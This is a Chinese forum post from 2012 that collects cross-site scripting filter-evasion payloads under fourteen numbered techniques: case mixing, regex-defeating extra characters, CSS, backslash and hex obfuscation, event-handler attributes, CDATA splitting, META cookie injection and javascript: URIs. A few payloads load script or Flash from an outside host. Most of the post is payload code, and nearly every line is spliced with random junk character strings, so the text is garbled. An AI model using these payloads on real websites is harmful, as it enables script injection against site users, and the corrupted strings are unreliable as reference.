1. 改变字符大小写* I4 d3 a* E) R3 @- z3 D) j
! x# ^# f" P$ x# u" c1 g
6 x( ]3 Q" ^) d; a
1 X' @1 Z. j7 y. ^+ o <sCript>alert(‘d’)</scRipT>
$ G, {: M9 \8 R' g* G# R( u0 |- i* k- ^2 r
2. 利用多加一些其它字符来规避Regular Expression的检查; P! t* v5 A: o; K& d& O0 E& N
0 X/ S2 e: l* @; Y <<script>alert(‘c’)//<</script>
, ?6 N7 K3 J# c0 |+ g B
, g! d* d% a8 `, E( Q <SCRIPT a=">" SRC="t.js"></SCRIPT>9 j* z/ H! \4 ~" B( W$ v3 o
# z1 v: d; p8 n: ~. C/ s <SCRIPT =">" SRC="t.js"></SCRIPT>$ X0 D- ]' G4 S1 Y. f# S+ M
, s( x7 L u5 o3 M5 ?+ ^" a
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
8 l! W$ Y3 s0 ^3 }2 t
$ S: a6 K/ E2 i7 W/ g% e& H <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
& q2 y# R# ?! z# ^2 i% ]# b% u& A1 Z0 d* s/ I7 S
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
Y6 p# X4 _+ g o& w4 A9 ^" S4 Q( h8 A5 Z
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>6 U/ N9 t+ h5 Y' J% d4 P
/ F j. S! ^( i1 Y( S3. 以其它扩展名取代.js7 g7 I* D, x) }0 S5 j
3 c) W/ j8 g! ~ V <script src="bad.jpg"></script>9 q; I0 C( t! }4 D& H, D+ {4 |* j3 \
3 K+ c* q9 ^7 `" P/ _4. 将Javascript写在CSS档里
; ^3 y- ? w2 [% t
3 ?3 W' I& N7 D$ C! j6 e <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
- B& r1 O3 J6 m8 R) W8 ]
! E; ^" o& e5 c6 _6 A' L, l# i example:
- @9 @9 a% Z% g. `6 J2 K: m" y) X: `( \
body {' G+ u8 v2 K" e1 P0 L- n7 k
& i, w8 b5 ^, I- z7 I background-image: url(‘javascript:alert("XSS");’)0 m; G( _. I% u
) l% r9 L) P9 _# X2 ^2 h
}1 n! N5 V2 P- y, r
( Y8 d, m8 Q1 ^! a5. 在script的tag里加入一些其它字符1 E) ~1 c3 O+ n
- L. N% ?" A7 \ <SCRIPT/SRC="t.js"></SCRIPT>
) [ M6 I( w9 d, A* {% r
3 k: R% {, h- T8 O <SCRIPT/anyword SRC="t.js"></SCRIPT>
3 U+ G: ?1 ]" {: u5 Q5 b1 f+ _
: n4 b+ U$ a" [6. 使用tab或是new line来规避: `2 j! M/ c3 Q5 C( v9 H
. O. e& a- n' V7 E3 g9 ^/ ?+ h0 I
<img src="jav ascr ipt:alert(‘XSS3′)">
! R( E4 o5 ]) h: z/ M& Y/ d" P0 p/ W, h* U( b" M
<img src="jav ascr ipt:alert(‘XSS3′)">
7 B; I1 E2 @0 ` e5 S6 \, ?; n
/ C: I% C3 V5 i' s; v <IMG SRC="jav ascript:alert(‘XSS’);">; G( T0 [+ |5 v
2 Z3 }+ C2 S% F4 V, s3 B
-> tag" s: J ?: J% v( Q" \1 y
6 J; L# G( |$ M: m% h8 U7 l -> new line
0 m. y; W. i6 |' Z+ k" }. e
+ y0 K6 S, E, l& @7. 使用"\"来规避/ G: V1 G3 c8 |% G, T
: m+ {% X, |6 S. J- [5 p <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>& R7 s! R1 V5 a1 ]% W, D; Z
; H) K- ~8 P8 j, J <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>' g6 ^! M3 v V2 s
" B! k; g: S7 ?& a- L7 ]5 O
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">0 q7 d, w* w$ j+ u7 Q
/ D. K6 T8 ]6 Y# x! o% K8 A5 H2 n
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">3 n0 F* _- G' d; s5 U# d4 k1 [
: \. J/ ^( r, X7 _/ a
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>) ^2 B g7 r/ l! |) [2 t U
) q. c/ U& [4 c( w' m+ U' ^7 a& _8. 使用Hex encode来规避(也可能会把";"拿掉)* Q" L: D/ S2 A N* C' i: Y
U8 @9 V: [7 J* p2 x
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
$ p6 n6 S% S* B! r9 b5 S! \8 g) Z+ u* B R E
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
( \3 _; x+ {* U, f/ K0 l2 {
) r: o7 s9 [ F- g, v+ C <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">+ N; ?( T8 { i" ?
) |: X/ f! r) P$ I8 Z
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
2 Z! P- n; t. m4 T5 m7 S8 m( N1 D$ \0 s1 |1 Z3 d
9. script in HTML tag
8 y5 a5 J' A& i# }: v
. n6 u( _5 E; |! _2 G% ^* W: F. D <body onload=」alert(‘onload’)」>2 X+ {$ h1 f% C4 d! D8 \4 m" N) ?
* V2 f5 g+ v$ v8 w: M' g
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
" R5 Y) ?9 p4 g/ p/ x) }3 p$ p7 t2 j
10. 在swf里含有xss的code0 `* K7 C: X7 _6 b; G% h
2 D6 p+ U5 s9 ]4 w1 V+ K
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
0 a- _& z `( \. S5 S7 t1 @
& ]& i( i4 u- B" u4 O9 e( T11. 利用CDATA将xss的code拆开,再组合起来。/ e( E" Y8 c% P) O9 ~: j0 }
0 t/ B8 d, f! K; j) ~; J
<XML ID=I><X><C>
7 q: H" E, y4 H" i; x3 f3 ^
5 ]% {/ ]" u9 R <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>/ p$ p" U5 D& a
+ B/ E6 Z1 j2 j* k" O D </C></X>
, L" G, H- z' \* x
( e4 f3 O8 k7 C0 E0 X </xml>
9 T' E) J2 b- x& O& ^
% K( \8 G3 M8 z- c2 B. Q7 k <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>5 \; { \: d4 y; J# U# h; e* _. L
; \* h6 [: k6 B$ y <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
5 Y! T3 F. A/ Q/ Q0 O) r8 Z& ]: Q4 p4 s/ g3 W! K0 P" A$ X, E
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
' h" Y3 @( s( h& |( K
$ `: ?& G' Q$ h! c* ?6 W1 l% W6 E: J12. 利用HTML+TIME。: h+ g% d% D: j \3 m8 D! c
0 H# n6 Y# H* h% }5 Z
<HTML><BODY>
7 C$ G7 w- ^6 w$ \9 Q' H% _2 d; q0 y+ X M
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"># Q- P# L: G9 g
9 F( C. a3 ?0 a3 @0 {# [0 u <?import namespace="t" implementation="#default#time2">
: j7 e' B- }" s: i( m% x @
! K9 ~* i6 b7 @7 c" O <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
" x4 I4 ?* x& t% m6 O5 X) l
- K3 M3 v" }+ R6 d/ o( x& @1 c </BODY></HTML>
j+ ]' K1 f/ E; y3 S; _& \3 H9 v
13. 透过META写入Cookie。
9 s8 s1 ~+ X7 _( n# h
" q. w+ K' c( {+ j5 d" w& H <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
1 M5 r2 Q' {% L# h/ k$ E: G7 N) l/ O- u6 @! W1 g. T
14. javascript in src , href , url
. T. Z+ U+ D9 I4 `# Y2 v, d! L4 o0 O6 G. L% K A) }- @
<IFRAME SRC=javascript:alert(’13′)></IFRAME>) D T. m y$ e. M* V
5 c s, a3 @" O. i$ v1 W' \4 r
<img src="javascript:alert(‘XSS3′)">: E% r1 ]) b+ q0 P( H7 D
& d; z; F+ N$ U* v6 j
<IMG DYNSRC="javascript:alert(‘XSS20′)">
! i$ \0 N8 H$ G8 Z
1 l1 h) }: f2 J, e2 A! s" w <IMG LOWSRC="javascript:alert(‘XSS21′)">
3 R& w/ J9 e3 C- Q8 w
: v: A9 F; V2 a+ v3 [4 [+ Z <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">, { |) x8 D7 f. {* _
; t4 e: Z' W! p <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>5 Y: _, ]9 |8 H6 r- A* j; g
- E8 B7 [" q9 n0 j% x4 ]3 @ M
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
2 {: z6 ~& w K! j) V
4 g8 @$ H/ _7 q <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
- L1 X+ d: b" h* V$ k- A- Z5 O P! [0 f+ O" Z" C) g
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}, V$ N0 l3 d/ b
% b/ X4 V M* G. G! S7 ?8 x </STYLE><A CLASS=XSS></A>
% ~' F0 J( l& @- r% J$ t" L4 J. g' w0 y2 D
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
. s" L6 |% J# {: C/ {% `1 t6 O
( W: S; ]" g" T9 s' x9 p; @& t. h |
发表于 2012-12-31 09:59:28
收藏
支持
反对